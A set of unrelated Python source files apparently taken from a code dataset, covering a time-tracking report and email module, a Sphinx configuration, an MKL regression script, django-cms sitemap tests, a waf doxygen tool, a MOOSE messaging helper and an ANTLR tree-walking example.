from timeflow.utils import strip_log
def get_total_stats_times(work_time, slack_time, today_work_time):
"""
Returns string output for totals times spent working and slacking
"""
output = 'Work: {}\n'.format(format_duration_short(sum(work_time)))
output += 'Slack: {}'.format(format_duration_short(sum(slack_time)))
if today_work_time:
today_hours, today_minutes = get_time(today_work_time)
output += '\n\nToday working for: {}'.format(
format_duration_short(today_work_time)
)
return output
def create_report(report_dict):
"""
Returns string output for stats report
"""
output = ""
report_dict = OrderedDict(sorted(report_dict.items()))
for project in report_dict:
project_output = "{}:\n".format(project)
project_report = report_dict[project]
total_seconds = 0
for log in project_report:
log_seconds = project_report[log]
total_seconds += log_seconds
# if log is empty - just state the project name
if not log:
log = project
project_output += " {time}: {log}\n".format(
time=format_duration_long(log_seconds),
log=log
)
project_output += " Total: {time}\n".format(
time=format_duration_long(total_seconds),
)
output += project_output
output += '\n'
# remove trailing newlines as they may add up in the pipeline
return output.strip('\n')
def create_full_report(work_report_dict, slack_report_dict):
"""
Returns report for both - work and slack
"""
output = ""
work_report = create_report(work_report_dict)
slack_report = create_report(slack_report_dict)
output += "{:-^67s}\n".format(" WORK ")
output += work_report
output += "\n" # I want empty line between work and slack report
output += "{:-^67s}\n".format(" SLACK ")
output += slack_report
return output
def create_report_as_gtimelog(report_dict, literal_time_range=''):
"""
Returns string output for report which is generated as in gtimelog
"""
output = ""
project_totals_output = ""
output += "{}{}\n".format(" " * 64, "time")
report_dict = OrderedDict(sorted(report_dict.items()))
total_seconds = 0
for project in report_dict:
total_project_seconds = 0
project_report = report_dict[project]
for log in project_report:
entry = "{}: {}".format(project, log)
seconds = project_report[log]
time_string = format_duration_short(seconds)
output += "{:62s} {}\n".format(entry, time_string)
total_project_seconds += seconds
project_totals_output += "{:62s} {}\n".format(project, format_duration_short(total_project_seconds))
total_seconds += total_project_seconds
output += "\n"
output += "Total work done{}{}: {}\n\n".format(
' ' if literal_time_range else '', # add space if time range exists
literal_time_range,
format_duration_short(total_seconds)
)
output += "By category:\n\n"
output += project_totals_output
return output
def calculate_stats(lines, date_from, date_to, today=False):
work_time = []
slack_time = []
today_work_time = None
line_begins = date_begins(lines, date_from)
line_ends = date_ends(lines, date_to)
date_not_found = (line_begins is None or line_ends < line_begins)
if date_not_found:
return work_time, slack_time, today_work_time
data = parse_lines()
for i, line in enumerate(data[line_begins:line_ends + 1]):
# if we got to the last line - stop
if line_begins + i + 1 > line_ends:
break
next_line = data[line_begins + i + 1]
line_date = line.date
next_line_date = next_line.date
# if it's day switch, skip this cycle
if line_date != next_line_date:
continue
if next_line.is_slack:
slack_time.append(calc_time_diff(line, next_line))
else:
work_time.append(calc_time_diff(line, next_line))
if today:
today_start_time = dt.datetime.strptime(
"{} {}".format(data[line_begins].date, data[line_begins].time),
DATETIME_FORMAT
)
today_work_time = (dt.datetime.now() - today_start_time).seconds
return work_time, slack_time, today_work_time
def calculate_report(lines, date_from, date_to,
filter_projects=[],
exclude_projects=[]):
"""Creates and returns report dictionaries
Report dicts have form like this:
{<Project>: {<log_message>: <accumulative time>},
{<log_message1>: <accumulative time1>}}
"""
# XXX: need to check that same project is not in both: filters and excludes
work_dict = defaultdict(lambda: defaultdict(dict))
slack_dict = defaultdict(lambda: defaultdict(dict))
line_begins = date_begins(lines, date_from)
line_ends = date_ends(lines, date_to)
date_not_found = (line_begins is None or line_ends < line_begins)
if date_not_found:
return work_dict, slack_dict
data = parse_lines()
for i, line in enumerate(data[line_begins:line_ends + 1]):
# if we got to the last line - stop
if line_begins + i + 1 > line_ends:
break
next_line = data[line_begins + i + 1]
line_date = line.date
next_line_date = next_line.date
# if it's day switch, skip this cycle
if line_date != next_line_date:
continue
time_diff = calc_time_diff(line, next_line)
project = strip_log(next_line.project)
if project_should_be_in_report(project, filter_projects, exclude_projects):
log = strip_log(next_line.log)
if next_line.is_slack:
# if log message is identical add time_diff
# to total time of the log
if slack_dict[project][log]:
total_time = slack_dict[project][log]
total_time += time_diff
slack_dict[project][log] = total_time
else:
slack_dict[project][log] = time_diff
else:
if work_dict[project][log]:
total_time = work_dict[project][log]
total_time += time_diff
work_dict[project][log] = total_time
else:
work_dict[project][log] = time_diff
return work_dict, slack_dict
def project_should_be_in_report(project, filters, excludes):
if project in filters:
return True
elif project in excludes:
return False
elif filters == []:
return True
elif excludes == []:
return False
def get_daily_report_subject(day, person):
"""
Returns subject string for daily report email
`day:datetime.date` - date of the day we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
# it's possible to use strftime('%a'), but it's locale sensitive,
# and I do not want this
weekday_names = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
calendar_time = "{weekday}, week {week:02}".format(
weekday=weekday_names[day.isocalendar()[2]],
week=day.isocalendar()[1],
)
subject = "{day} report for {person} ({calendar_time})".format(
day=day.strftime(DATE_FORMAT),
person=person,
calendar_time=calendar_time
)
return subject
def get_weekly_report_subject(week_day, person):
"""
Returns subject string for weekly report email
`week_day:datetime.date` - any date for the week we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
calendar_time = "week {:02}".format(week_day.isocalendar()[1])
subject = "Weekly report for {person} ({calendar_time})".format(
person=person,
calendar_time=calendar_time
)
return subject
def get_monthly_report_subject(month_day, person):
"""
Returns subject string for monthly report email
`month_day:datetime.date` - any date for the month we are reporting for
`person:str` - reporting person's name, e.g. 'Jon Doe'
"""
calendar_time = "{year}/{month:02}".format(
year=month_day.year,
month=month_day.month
)
subject = "Monthly report for {person} ({calendar_time})".format(
person=person,
calendar_time=calendar_time
)
return subject
def get_custom_range_report_subject(date_from, date_to, person):
subject = "Custom date range report for {person} ({_from:%Y-%m-%d} - {to:%Y-%m-%d})".format(
person=person,
_from=date_from,
to=date_to,
)
return subject
def email_report(date_from, date_to, report, email_time_range=None):
settings = Settings()
settings.load()
sender = settings.email_address
receivers = [settings.activity_email]
date_from_time_range = dt.datetime.strptime(date_from, DATE_FORMAT)
subject = ''
if email_time_range == 'day':
subject = get_daily_report_subject(date_from_time_range, settings.name)
elif email_time_range == 'week':
subject = get_weekly_report_subject(date_from_time_range, settings.name)
elif email_time_range == 'month':
subject = get_monthly_report_subject(date_from_time_range, settings.name)
else:
# convert date strings to datetime objects
_date_from = dt.datetime.strptime(date_from, DATE_FORMAT)
_date_to = dt.datetime.strptime(date_to, DATE_FORMAT)
subject = get_custom_range_report_subject(_date_from, _date_to, settings.name)
full_subject = "[Activity] {}".format(subject)
message = (
"From: {}\n"
"To: {}\n"
"Subject: {}\n\n"
"{}"
).format(sender, ", ".join(receivers), full_subject, report)
try:
conn = smtplib.SMTP(settings.smtp_server, settings.smtp_port)
conn.ehlo()
conn.starttls()
conn.login(settings.email_user, settings.email_password)
conn.sendmail(sender, receivers, message)
print("Successfully sent email")
except smtplib.SMTPException:
print("Error: unable to send email")
| mit | -1,327,857,093,059,372,500 | 31.640719 | 109 | 0.608604 | false |
Darthone/bug-free-octo-parakeet | docs/source/conf.py | 2 | 5299 | # -*- coding: utf-8 -*-
#
# Informed Finance Canary documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 9 20:29:30 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("../ifc"))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.imgmath',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'numpydoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Informed Finance Canary'
copyright = u'2017, Dario Marasco, Anand Patel, Wei-Ming Koh, Trey Harper'
author = u'Dario Marasco, Anand Patel, Wei-Ming Koh, Trey Harper'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'1.0'
# The full version, including alpha/beta/rc tags.
release = u'1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'InformedFinanceCanarydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'InformedFinanceCanary.tex', u'Informed Finance Canary Documentation',
u'Dario Marasco, Anand Patel, Wei-Ming Koh, Trey Harper', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'informedfinancecanary', u'Informed Finance Canary Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'InformedFinanceCanary', u'Informed Finance Canary Documentation',
author, 'InformedFinanceCanary', 'One line description of project.',
'Miscellaneous'),
]
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| mit | -3,840,951,447,199,581,700 | 30.541667 | 87 | 0.683714 | false |
nachitoys/distributionalSemanticStabilityThesis | mkl.py | 2 | 6182 | from modshogun import *
from numpy import *
from sklearn.metrics import r2_score
from scipy.stats import randint
from scipy.stats import randint as sp_randint
from scipy.stats import expon
from mkl_regressor import *
from time import localtime, strftime
if __name__ == "__main__":
import Gnuplot, Gnuplot.funcutils
from sklearn.grid_search import RandomizedSearchCV as RS
from argparse import ArgumentParser as ap
parser = ap(description='This script trains/applies a SVR over any input dataset of numerical representations. The main aim is to determine a set of learning parameters')
parser.add_argument("-x", help="Input file name (train vectors)", metavar="input_file", default=None)
parser.add_argument("-y", help="""Regression labels file. Do not specify this argument if you want to uniauely predict over any test set. In this case, you must to specify
the SVR model to be loaded as the parameter of the option -o.""", metavar="regrLabs_file", default = None)
parser.add_argument("-X", help="Input file name (TEST vectors)", metavar="test_file", default = None)
parser.add_argument("-Y", help="Test labels file.", metavar="testLabs_file", default = None)
parser.add_argument("-n", help="Number of tests to be performed.", metavar="tests_amount", default=1)
parser.add_argument("-o", help="""The operation the input data was derived from. Options: {'conc', 'convss', 'sub'}. In the case you want to give a precalculated center for
width randomization (the median width), specify the number. e.g. '-o 123.654'. A filename can be specified, which is the file where a pretrained MKL model,
e.g. '-o filename.model'""", metavar="median", default=0.01)
#parser.add_argument("-u", help="Especify C regulazation parameter. For a list '-u C:a_b', for a value '-u C:a'.", metavar="fixed_params", default = None)
#parser.add_argument("-K", help="Kernel type custom specification. Uniquely valid if -u is not none. Options: gaussian, linear, sigmoid.", metavar="kernel", default = None)
#parser.add_argument("-s", help="Toggle if you will process sparse input format.", action="store_true", default = False)
parser.add_argument("--estimate", help="Toggle if you will predict the training.", action="store_true", default = False)
parser.add_argument("--predict", help="Toggle if you will predict just after estimating (This is assumed if you provide a model file instead of a medianwidth: option '-m'.).", action="store_true", default = False)
parser.add_argument("-k", help="k-fold cross validation for the randomized search.", metavar="k-fold_cv", default=None)
parser.add_argument("-p", help="Minimum number of basis kernels.", metavar="min_amount", default=2)
parser.add_argument("-P", help="Maximum number of basis kernels.", metavar="max_amount", default=10)
args = parser.parse_args()
#name_components = shatter_file_name()
model_file = None # "/almac/ignacio/data/mkl_models/mkl_0.model"
out_file = "mkl_outs/mkl_idx_corpus_source_repr_dims_op_other.out"
if args.X: # Test set.
labels_t = loadtxt(args.Y) #loadtxt("/almac/ignacio/data/sts_all/pairs-NO_2013/STS.gs.FNWN.txt")
if args.Y:
data_t = loadtxt(args.X) #loadtxt("/almac/ignacio/data/sts_all/pairs-NO_2013/vectors_H10/pairs_eng-NO-test-2e6-nonempty_FNWN_d2v_H10_sub_m5w8.mtx")
if args.x != None:
assert args.y # If training data given, supply corresponding labels.
labels = loadtxt(args.y) #loadtxt("/almac/ignacio/data/sts_all/pairs-NO_2013/STS.gs.OnWN.txt")
data = loadtxt(args.x) #loadtxt("/almac/ignacio/data/sts_all/pairs-NO_2013/vectors_H10/pairs_eng-NO-test-2e6-nonempty_OnWN_d2v_H10_sub_m5w8.mtx")
k = int(args.k)
N = int(args.n)
min_p = int(args.p)
max_p = int(args.P)
median_w = float(args.o)
# median_width = None, width_scale = 20.0, min_size=2, max_size = 10, kernel_size = None
sys.stderr.write("\n>> [%s] Training session begins...\n" % (strftime("%Y-%m-%d %H:%M:%S", localtime())))
params = {'svm_c': expon(scale=100, loc=0.001),
'mkl_c': expon(scale=100, loc=0.001),
'degree': sp_randint(0, 24),
#'widths': expon_vector(loc = m, min_size = 2, max_size = 10)
'width_scale': [0.5, 1.0, 2.0, 2.5, 3.0, 3.5, 4.0],
'median_width': expon(scale=1, loc=median_w),
'kernel_size': [2, 3, 4, 5, 6, 7, 8] }
param_grid = []
for i in xrange(N):
param_grid.append(params)
i = 0
for params in param_grid:
mkl = mkl_regressor()
rs = RS(mkl, param_distributions = params, n_iter = 20, n_jobs = 24, cv = k, scoring="mean_squared_error")#"r2")
rs.fit(data, labels)
rs.best_estimator_.save('/almac/ignacio/data/mkl_models/mkl_%d.model' % i)
if args.estimate: # If user wants to save estimates
test_predict(data = data, machine = rs.best_estimator_, labels = labels, out_file = out_file)
if args.predict: # If user wants to predict and save just after training.
assert not args.X is None # If test data is provided
#preds = rs.best_estimator_.predict(data_t)
if args.Y: # Get performance if test labels are provided
test_predict(data = data_t, machine = rs.best_estimator_, labels = labels_t, out_file = out_file + ".pred")
else: # Only predictions
test_predict(data = data_t, machine = rs.best_estimator_, out_file = out_file + ".pred")
sys.stderr.write("\n:>> [%s] Finished!!\n" % (strftime("%Y-%m-%d %H:%M:%S", localtime())))
else:
idx = 0
test_predict(data = data_t, machine = "mkl_regerssion", file="/almac/ignacio/data/mkl_models/mkl_%d.asc" % idx,
labels = labels_t, out_file = out_file)
sys.stderr.write("\n:>> [%s] Finished!!\n" % (strftime("%Y-%m-%d %H:%M:%S", localtime())))
| gpl-2.0 | -2,368,194,713,678,559,700 | 66.195652 | 217 | 0.626658 | false |
isotoma/django-cms | cms/tests/sitemap.py | 18 | 6524 | # -*- coding: utf-8 -*-
from cms.models import Title, Page
from cms.sitemaps import CMSSitemap
from cms.test_utils.testcases import CMSTestCase
from cms.api import create_page, create_title
from cms.test_utils.util.context_managers import SettingsOverride
class SitemapTestCase(CMSTestCase):
def setUp(self):
"""
Tree from fixture:
+ P1 (de, en)
| + P2 (de, en)
| + P3 (de, en)
| + P9 (de unpublished, en)
| + P10 unpublished (de, en)
| + P11 (en)
+ P4 (de, en)
| + P5 (de, en)
+ P6 (de, en) (not in menu)
+ P7 (de, en)
+ P8 (de, en)
"""
defaults = {
'template': 'nav_playground.html',
'language': 'en',
}
with SettingsOverride(CMS_PERMISSION=False):
p1 = create_page('P1', published=True, in_navigation=True, **defaults)
create_title(language='de', title="other title %s" % p1.get_title('en'), page=p1)
p4 = create_page('P4', published=True, in_navigation=True, **defaults)
create_title(language='de', title="other title %s" % p4.get_title('en'), page=p4)
p6 = create_page('P6', published=True, in_navigation=False, **defaults)
create_title(language='de', title="other title %s" % p6.get_title('en'), page=p6)
p2 = create_page('P2', published=True, in_navigation=True, parent=p1, **defaults)
create_title(language='de', title="other title %s" % p2.get_title('en'), page=p2)
p3 = create_page('P3', published=True, in_navigation=True, parent=p2, **defaults)
create_title(language='de', title="other title %s" % p3.get_title('en'), page=p3)
p5 = create_page('P5', published=True, in_navigation=True, parent=p4, **defaults)
create_title(language='de', title="other title %s" % p5.get_title('en'), page=p5)
p7 = create_page('P7', published=True, in_navigation=True, parent=p6, **defaults)
create_title(language='de', title="other title %s" % p7.get_title('en'), page=p7)
p8 = create_page('P8', published=True, in_navigation=True, parent=p6, **defaults)
create_title(language='de', title="other title %s" % p8.get_title('en'), page=p8)
p9 = create_page('P9', published=True, in_navigation=True, parent=p1, **defaults)
create_title(language='de', title="other title %s" % p9.get_title('en'), page=p9)
p10 = create_page('P10', published=False, in_navigation=True, parent=p9, **defaults)
create_title(language='de', title="other title %s" % p10.get_title('en'), page=p10)
create_page('P11', published=True, in_navigation=True, parent=p9, **defaults)
p1 = p1.reload()
p2 = p2.reload()
p3 = p3.reload()
p4 = p4.reload()
p5 = p5.reload()
p6 = p6.reload()
p7 = p7.reload()
p8 = p8.reload()
p8.publish('de')
p7.publish('de')
p5.publish('de')
p3.publish('de')
p2.publish('de')
p6.publish('de')
p4.publish('de')
p1.publish('de')
self.assertEqual(Title.objects.filter(published=True, publisher_is_draft=False).count(), 18)
def test_sitemap_count(self):
"""
Has the sitemap the correct number of elements?
"""
sitemap = CMSSitemap()
# 8 pages with en and de titles published
# 1 page published only in english(with existsing de title)
# 1 page with both titles but unpublished
# 1 page with only english title
self.assertEqual(sitemap.items().count(), 18)
def test_sitemap_items_location(self):
"""
Check the correct URL in location, recreating it according to the title
attributes (instead of using Page.get_absolute_url) for a lower level
check
"""
sitemap = CMSSitemap()
urlset = sitemap.get_urls()
for item in urlset:
if item['item'].path:
url = 'http://example.com/%s/%s/' % (item['item'].language, item['item'].path)
else:
url = 'http://example.com/%s/%s' % (item['item'].language, item['item'].path)
self.assertEqual(item['location'], url)
def test_sitemap_published_titles(self):
"""
Check that published titles are in the urls
"""
sitemap = CMSSitemap()
locations = []
urlset = sitemap.get_urls()
for item in urlset:
locations.append(item['location'])
for title in Title.objects.public():
page = title.page.get_public_object()
if title.path:
url = 'http://example.com/%s/%s/' % (title.language, title.path)
else:
url = 'http://example.com/%s/%s' % (title.language, title.path)
if page.is_published('en') and not page.publisher_is_draft:
self.assertTrue(url in locations)
else:
self.assertFalse(url in locations)
def test_sitemap_unpublished_titles(self):
"""
Check that titles attached to unpublished pages are not in the urlset.
As titles are 'published' depending on their attached page, we create a
set of unpublished titles by checking titles attached to the draft and
public version of each page
"""
sitemap = CMSSitemap()
locations = []
urlset = sitemap.get_urls()
unpublished_titles = set()
for item in urlset:
locations.append(item['location'])
for page in Page.objects.drafts():
if page.get_public_object():
set1 = set(page.get_public_object().title_set.values_list('path', flat=True))
set2 = set(page.title_set.values_list('path', flat=True))
unpublished_titles.update(set2.difference(set1))
else:
unpublished_titles.update(page.title_set.values_list('path', flat=True))
for path in unpublished_titles:
title = Title.objects.get(path=path)
if title.path:
url = 'http://example.com/%s/%s/' % (title.language, title.path)
else:
url = 'http://example.com/%s/%s' % (title.language, title.path)
self.assertFalse(url in locations)
| bsd-3-clause | 4,840,892,718,469,946,000 | 41.363636 | 104 | 0.55794 | false |
rpmcpp/Audacity | lib-src/lv2/serd/waflib/extras/doxygen.py | 14 | 4734 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
from fnmatch import fnmatchcase
import os,os.path,re,stat
from waflib import Task,Utils,Node,Logs
from waflib.TaskGen import feature
DOXY_STR='${DOXYGEN} - '
DOXY_FMTS='html latex man rft xml'.split()
DOXY_FILE_PATTERNS='*.'+' *.'.join('''
c cc cxx cpp c++ java ii ixx ipp i++ inl h hh hxx hpp h++ idl odl cs php php3
inc m mm py f90c cc cxx cpp c++ java ii ixx ipp i++ inl h hh hxx
'''.split())
re_rl=re.compile('\\\\\r*\n',re.MULTILINE)
re_nl=re.compile('\r*\n',re.M)
def parse_doxy(txt):
tbl={}
txt=re_rl.sub('',txt)
lines=re_nl.split(txt)
for x in lines:
x=x.strip()
if not x or x.startswith('#')or x.find('=')<0:
continue
if x.find('+=')>=0:
tmp=x.split('+=')
key=tmp[0].strip()
if key in tbl:
tbl[key]+=' '+'+='.join(tmp[1:]).strip()
else:
tbl[key]='+='.join(tmp[1:]).strip()
else:
tmp=x.split('=')
tbl[tmp[0].strip()]='='.join(tmp[1:]).strip()
return tbl
class doxygen(Task.Task):
vars=['DOXYGEN','DOXYFLAGS']
color='BLUE'
def runnable_status(self):
'''
self.pars are populated in runnable_status - because this function is being
run *before* both self.pars "consumers" - scan() and run()
set output_dir (node) for the output
'''
for x in self.run_after:
if not x.hasrun:
return Task.ASK_LATER
if not getattr(self,'pars',None):
txt=self.inputs[0].read()
self.pars=parse_doxy(txt)
if not self.pars.get('OUTPUT_DIRECTORY'):
self.pars['OUTPUT_DIRECTORY']=self.inputs[0].parent.get_bld().abspath()
self.doxy_inputs=getattr(self,'doxy_inputs',[])
if not self.pars.get('INPUT'):
self.doxy_inputs.append(self.inputs[0].parent)
else:
for i in self.pars.get('INPUT').split():
if os.path.isabs(i):
node=self.generator.bld.root.find_node(i)
else:
node=self.generator.path.find_node(i)
if not node:
self.generator.bld.fatal('Could not find the doxygen input %r'%i)
self.doxy_inputs.append(node)
if not getattr(self,'output_dir',None):
bld=self.generator.bld
self.output_dir=bld.root.find_dir(self.pars['OUTPUT_DIRECTORY'])
if not self.output_dir:
self.output_dir=bld.path.find_or_declare(self.pars['OUTPUT_DIRECTORY'])
self.signature()
return Task.Task.runnable_status(self)
def scan(self):
if self.pars.get('RECURSIVE')=='YES':
Logs.warn("Doxygen RECURSIVE dependencies are not supported")
exclude_patterns=self.pars.get('EXCLUDE_PATTERNS','').split()
file_patterns=self.pars.get('FILE_PATTERNS','').split()
if not file_patterns:
file_patterns=DOXY_FILE_PATTERNS
nodes=[]
names=[]
for node in self.doxy_inputs:
if os.path.isdir(node.abspath()):
for m in node.ant_glob(file_patterns):
nodes.append(m)
else:
nodes.append(node)
return(nodes,names)
def run(self):
code='\n'.join(['%s = %s'%(x,self.pars[x])for x in self.pars])
code=code
cmd=Utils.subst_vars(DOXY_STR,self.env)
env=self.env.env or None
proc=Utils.subprocess.Popen(cmd,shell=True,stdin=Utils.subprocess.PIPE,env=env,cwd=self.generator.bld.path.get_bld().abspath())
proc.communicate(code)
return proc.returncode
def post_run(self):
nodes=self.output_dir.ant_glob('**/*',quiet=True)
for x in nodes:
x.sig=Utils.h_file(x.abspath())
self.outputs+=nodes
return Task.Task.post_run(self)
class tar(Task.Task):
run_str='${TAR} ${TAROPTS} ${TGT} ${SRC}'
color='RED'
after=['doxygen']
def runnable_status(self):
for x in getattr(self,'input_tasks',[]):
if not x.hasrun:
return Task.ASK_LATER
if not getattr(self,'tar_done_adding',None):
self.tar_done_adding=True
for x in getattr(self,'input_tasks',[]):
self.set_inputs(x.outputs)
if not self.inputs:
return Task.SKIP_ME
return Task.Task.runnable_status(self)
def __str__(self):
tgt_str=' '.join([a.nice_path(self.env)for a in self.outputs])
return'%s: %s\n'%(self.__class__.__name__,tgt_str)
@feature('doxygen')
def process_doxy(self):
if not getattr(self,'doxyfile',None):
self.generator.bld.fatal('no doxyfile??')
node=self.doxyfile
if not isinstance(node,Node.Node):
node=self.path.find_resource(node)
if not node:
raise ValueError('doxygen file not found')
dsk=self.create_task('doxygen',node)
if getattr(self,'doxy_tar',None):
tsk=self.create_task('tar')
tsk.input_tasks=[dsk]
tsk.set_outputs(self.path.find_or_declare(self.doxy_tar))
if self.doxy_tar.endswith('bz2'):
tsk.env['TAROPTS']=['cjf']
elif self.doxy_tar.endswith('gz'):
tsk.env['TAROPTS']=['czf']
else:
tsk.env['TAROPTS']=['cf']
def configure(conf):
conf.find_program('doxygen',var='DOXYGEN')
conf.find_program('tar',var='TAR')
| gpl-2.0 | -1,094,926,839,967,606,800 | 32.104895 | 129 | 0.667934 | false |
yipenggao/moose | python/mooseutils/message.py | 4 | 3962 | import os
import traceback
from mooseutils import colorText
try:
from PyQt5 import QtWidgets, QtCore
MOOSE_USE_QT5 = True
except:
MOOSE_USE_QT5 = False
"""
Global for enabling/disabling debug mode.
"""
MOOSE_DEBUG_MODE = os.environ.get("MOOSE_PYTHON_DEBUG_MODE") == "1"
"""
Global for enabling/disabling testing mode.
"""
MOOSE_TESTING_MODE = False
if MOOSE_USE_QT5:
class MessageEmitter(QtCore.QObject):
message = QtCore.pyqtSignal(str, str)
def write(self, msg, color):
if not self.signalsBlocked():
self.message.emit(str(msg), str(color))
messageEmitter = MessageEmitter()
def mooseMessage(*args, **kwargs):
"""
A generic message function.
Args:
args[tuple]: Comma separated items to be printed, non strings are converted with 'repr'.
Kwargs:
error[bool]: (Default: False) When True and 'dialog=True' the the "Critical" icon is included with the message.
warning[bool]: (Default: False) When True and 'dialog=True' the the "Critical" icon is included with the message.
traceback[bool]: (Default: False) When True the stack trace is printed with the message.
dialog[bool]: (Default: False) When true a QDialog object is created, the error will still print to the console as well.
color[str]: (Default: None) Add the bash color string to the message (see colorText).
debug[bool]: (Default: False) Print the message only if tools.MOOSE_DEBUG_MODE = True.
test[bool]: FOR TESTING ONLY! (Default: False) When True the QDialog is not executed, just returned.
indent[int]: Number of levels to indent (2 spaces are applied to each level)
"""
# Grab the options
error = kwargs.pop('error', False)
warning = kwargs.pop('warning', False)
trace = kwargs.pop('traceback', False)
dialog = kwargs.pop('dialog', False)
color = kwargs.pop('color', None)
test = kwargs.pop('test', False)
indent = kwargs.pop('indent', 0)
# Build the message
message = []
for arg in args:
if not isinstance(arg, str):
message.append(repr(arg))
else:
message.append(arg)
message = '{}{}'.format(' '*2*indent, ' '.join(message))
# Show a dialog box
if MOOSE_USE_QT5 and dialog and not MOOSE_TESTING_MODE:
box = QtWidgets.QMessageBox()
box.setText(message)
if warning:
box.setIcon(QtWidgets.QMessageBox.Warning)
elif error:
box.setIcon(QtWidgets.QMessageBox.Critical)
if test:
return box
box.exec_()
# Emit the message to any listeners
if MOOSE_USE_QT5:
messageEmitter.write(message, color)
# Print the message to screen
if color:
message = colorText(message, color)
print message
# Show the traceback
if trace and MOOSE_USE_QT5:
traceback.print_stack()
stack = ''.join(traceback.format_stack())
messageEmitter.write(stack, color)
def mooseError(*args, **kwargs):
"""
A mooseMessage setup to produce an error.
"""
return mooseMessage('ERROR\n', *args, error = kwargs.pop('error', True),
color = kwargs.pop('color', 'RED'),
traceback = kwargs.pop('traceback', True),
**kwargs)
def mooseWarning(*args, **kwargs):
"""
A mooseMessage setup to produce a warning.
"""
return mooseMessage('WARNING\n', *args, warning = kwargs.pop('warning', True),
color = kwargs.pop('color', 'YELLOW'), **kwargs)
def mooseDebug(*args, **kwargs):
"""
A mooseMessage that only appears with the global MOOSE_DEBUG_MODE = True or debug=True passed directly.
"""
if kwargs.pop('debug', MOOSE_DEBUG_MODE):
return mooseMessage(*args, color=kwargs.pop('color', 'CYAN'), **kwargs)
| lgpl-2.1 | 270,579,507,329,784,160 | 32.576271 | 128 | 0.617113 | false |
wbardzinski/boo | lib/antlr-2.7.5/examples/python/transform/transform.py | 21 | 1906 | import sys
import antlr
class Visitor(antlr.ASTVisitor):
def __init__(self,*args):
super(Visitor,self).__init__(*args)
self.level = 0
if not args:
self.cout = sys.stdout
return
if isinstance(args[0],file):
self.cout = args[0]
return
assert 0
def tabs(self):
print " " * self.level
def printf(self,fmt,*args):
if not args:
sys.stdout.write(fmt)
return
argv = tuple(args)
self.cout.write(fmt % argv)
def flush(self):
self.cout.flush()
def visit1(self,node):
if not node:
self.printf(" nil ")
return
c = node.getType()
t = node.getText()
k = node.getFirstChild()
s = node.getNextSibling()
self.printf("( <%s> ",c)
if t:
self.printf(" %s ",t)
self.visit1(k);
self.visit1(s);
self.printf(")")
def visit(self,node):
self.visit1(node);
self.printf("\n")
def main():
import transform_l
import transform_p
import transform_w
L = transform_l.Lexer()
P = transform_p.Parser(L)
P.setFilename(L.getFilename())
### Parse the input expression
try:
P.expr()
except antlr.ANTLRException, ex:
print "*** error(s) while parsing."
print ">>> exit(1)"
import sys
sys.exit(1)
ast = P.getAST()
if not ast:
print "stop - no AST generated."
import sys
sys.exit(1)
###show tree
print "Tree: " + ast.toStringTree()
print "List: " + ast.toStringList()
print "Node: " + ast.toString()
print "visit>>"
visitor = Visitor()
visitor.visit(ast);
print "visit<<"
W = transform_w.Walker();
### Traverse the tree created by the parser
W.expr(ast);
ast = W.getAST();
print "List: " + ast.toStringList()
if __name__ == "__main__":
main()
